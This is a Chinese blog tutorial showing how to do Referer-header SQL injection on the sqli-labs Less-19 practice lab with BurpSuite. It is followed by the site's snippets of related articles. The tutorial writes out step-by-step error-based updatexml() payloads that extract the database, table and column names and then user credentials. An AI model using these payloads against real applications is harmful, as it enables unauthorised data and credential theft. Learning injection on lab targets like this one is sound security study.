【SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)

已于 2022-07-01 02:58:13 修改
阅读量5.1k 收藏 11
点赞数 9
分类专栏: # 筑基07:WEB漏洞原理 文章标签: sql 安全 web安全
于 2022-02-21 16:04:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123030001
版权

目录

1 概述

  1. Referer :是 HTTP 请求头的一部分,当浏览器(或者模拟浏览器行为)向web 服务器发送请求的时候,头信息里有包含 Referer 。比如我在www.sojson.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com ,它的header 信息里就有:Referer=https://www.sojson.com。
  2. Referer 的作用:指示一个请求是从哪里链接过来。
  3. Referer 注入:referer注入其原理也和平时的注入一样,只不过说我们是将提交的参数以referer的方式提交。
  4. 一般的注入我们是使用get或者post方式提交:
    1. get方式提交就是直接在网址后面加上需要注入的语句;
    2. post则是通过表单方式,
    3. get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。

2 实验简介

2.1 实验平台

  1. 靶机:CentOS7安装docker,利用docker部署sqli-labs来作为实验平台。具体部署过程可以参考文章《Docker上搭建sqli-labs漏洞环境》。
  2. 真实机:为了方便发送Cookie,本实验利用BurpSuite来进行注入实验,BurpSuite的安装过程可以参考文章《BurpSuite简介及安装》。
  3. 靶机与真实机桥接到同一局域网中。

2.2 实验目标

  1. 获取网站后台数据库账号及密码。

3 实验过程

3.1 前戏

  1. 真实机打开BurpSuite,进入Proxy工具,打开自带浏览器,访问靶机sqli-labs的Less19,打开页面如下。
    在这里插入图片描述
  2. 该关卡模拟登录页面注入,先尝试Dumb账户(密码也是Dumb)登录,登录后页面显示如下,页面上显示出了referer参数信息,给我们带来了注入点的提示。
    在这里插入图片描述
  3. 在BurpSuite工具的intercept界面开启 intercept is on,重新加载上一步的页面,让BurpSuite获取到请求,将请求右键发送到repeater工具,点击forward。
    在这里插入图片描述
  4. 在BurpSuite的Repeater工具中,我们可以看到刚刚发送过来的请求,点击发送,可以看到响应中有referer的信息,因此猜测该字段内容可以回显到页面上,可能存在注入。
    在这里插入图片描述

3.2 判断注入点及注入类型

  1. 正常流程应该是先判断能否在常规位置进行注入,实在没有的情况下再找http头部信息能否注入,本节实验省去了测试其他位置能否注入的过程,仅为演示如何进行referer注入。
  2. 回到repeater界面,对请求进行编辑,referer信息修改为test,测试响应是否能回显该处内容。可以看到正常显示。
    在这里插入图片描述
  3. 修改参数为test'时,系统出现错误提示,由此我们猜测是因为多了一个单引号引起引号未正常闭合的情况。与以往不同的时,这里的错误语句还出现了一串包括IP和账号在内的其他语句,我们可以猜测,系统将该语句拼接到我们注入参数后一并执行。
    在这里插入图片描述
  4. 修改参数为test' and '1'='1,程序正常运行,说明该参数为单引号闭合的字符型注入。
    在这里插入图片描述
  5. 结论:该参数注入信息会回显到响应中,是一个注入点,且该参数为为单引号闭合的字符型注入。

3.3 获取库名表名字段名字段内容

  1. 获取库名。修改参数为test' and updatexml(1,concat('~',database(),'~'),1) and '1'='1,此处在语句最后加上了一个恒等式,一方面是为了闭合后台语句的单引号,另一方面是为了保证当我们语句拼接如后台后不影响后续语句的运行,这是该闭合方式比采用#号等方式的高明之处。通过该参数,我们爆出了该网站所在数据库名。
    在这里插入图片描述
  2. 获取表名。修改cookie参数为test' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = database() ),'~'),1) and '1'='1,共爆出4个表名,其中users是我们所要的目标。
    在这里插入图片描述
  3. 获取字段名。修改参数为test' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name = 'users'),'~'),1) and '1'='1,响应如下,共爆出3个字段名。
    在这里插入图片描述
  4. 获取用户数量。考虑到updatexml()函数回显字符长度有限,先获取用户数量,再逐个获取用户名与密码。修改参数为test' and updatexml(1,concat('~',(select count(username) from users),'~'),1) and '1'='1,响应中错误提示如下,可知共有13个用户。
    在这里插入图片描述
  5. 获取第一个用户账号及密码。修改参数为test' and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) and '1'='1,响应中错误提示如下,可知第一个账号密码均为Dumb,剩余账号密码只需修改limit参数便可逐个取出。
    在这里插入图片描述

3.4 实验结果

  1. 实验成功爆出网站后台数据库账号及密码。
  2. 实验关键在于构建能够闭合引号的注入参数。

4 总结

  1. 了解referer的含义与作用;
  2. 掌握referer注入的方法。
Fighting_hawk
关注
专栏目录
24-4 SQL 注入 - http头注入referer注入
weixin_43263566的博客
02-28 457
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具
m0_64378913的博客
05-06 2627
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
Less19 (referer注入)
老司机开代码的博客
08-03 1845
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求头中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
BurpSuite使用——HTTP_burpsuite内嵌浏览器
最新发布
2401_87034229的博客
09-11 937
对一企业办公系统的源代码进行授权检测,在检查过程中,发现程序员(可能是临时工)使用PHP程序,处理服务端接收客户端传递的数据时,使用的是$_REQUEST[],前端使用的是GET方式,然后就遇到问题了"Request-URI Too Long"。$_GET 变量接受所有以 get 方式发送的请求,及浏览器地址栏中的?之后的内容。$_POST 变量接受所有以 post 方式发送的请求,例如,一个 form 以 method=post 提交,提交后 php 会处理 post 过来的全部变量。
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1329
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 1958
根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此题存在 Refer注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
CTFHub - Refer注入
Have_a_great_day的博客
09-12 818
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 581
提示:本文章仅限学习参考,切勿用于非法用途。
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 800
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6775
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3382
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3105
sqli-labs靶场过关 源码分析
Sqlmap2021 -- Referer注入
weixin_41489908的博客
07-07 2102
一直向前走,天总会亮的。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包,将封包内容保存到referer.txt POST /sqli/Less-19/ HTTP/1.1 Host: 192.168.139.129 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.139.129 Content-Type: a..
渗透测试---手把手教你SQL注入(3)---UA头注入referer注入
weixin_52796034的博客
10-10 660
有些网站会把用户的UA信息写入数据库,用来收集和统计用户信息,此时就有可能存在UA 头注入,一般会把数据插入到某张表中所以可以用报错注入。 当我们访问一个网站的时候,我们的浏览器需要告诉服务器我们是从哪个地方访问服务器的,大部分网站或者app都会将这样的信息写入数据库用来分析流量从哪里来,以及统计广告投入的成本,通常情况下,服务器会把数据插入到某张表中,那么我们就可以借此使用报错注入
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 1058
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHub-referer注入
m0_51589948的博客
05-19 894
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeater 对referer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
渗透测试之SQL注入(读写文件、dnslog盲注、宽字节注入、User-Agent注入Referer注入、Cookie注入、二次注入
Hi~ 土拨鼠
12-11 1366
文章目录读取文件操作写入文件操作宽字节注入Cookie注入 mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以利用SQL注入漏洞对文件进行读写(但前提是权限足够)。 前提条件: 当前用户具有文件权限,尽量具有root权限 查询是否有文件权限:select File_priv from mysql.user where user = 'root' and host = 'localhost'; secure_file_priv不为NULL secure_file_p
SQLilabs的第19关——http请求头注入(Referer)(报错注入
qq_73393033的博客
07-22 439
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
16、HTTP头注入(User-Agent、Referer)
weixin_41489908的博客
12-05 2112
环境sqli-labs less 18 1、在UA处输入特殊字符,报错 ​ 2、构造输入语句,获取数据库名称 or updatexml(1,concat(’##’,(database())),0))# 3、获取表名 or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.table...
搭建RHEL-7 SQLi-Labs平台实践SQL注入练习
本文主要介绍了在RHEL-7操作系统上搭建SQLi-Labs...总之,通过搭建SQLi-Labs平台,用户可以学习和实践不同类型的SQL注入漏洞,并了解如何防止和修复这些漏洞。这对于提高应用程序的安全性和防御注入攻击具有重要意义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值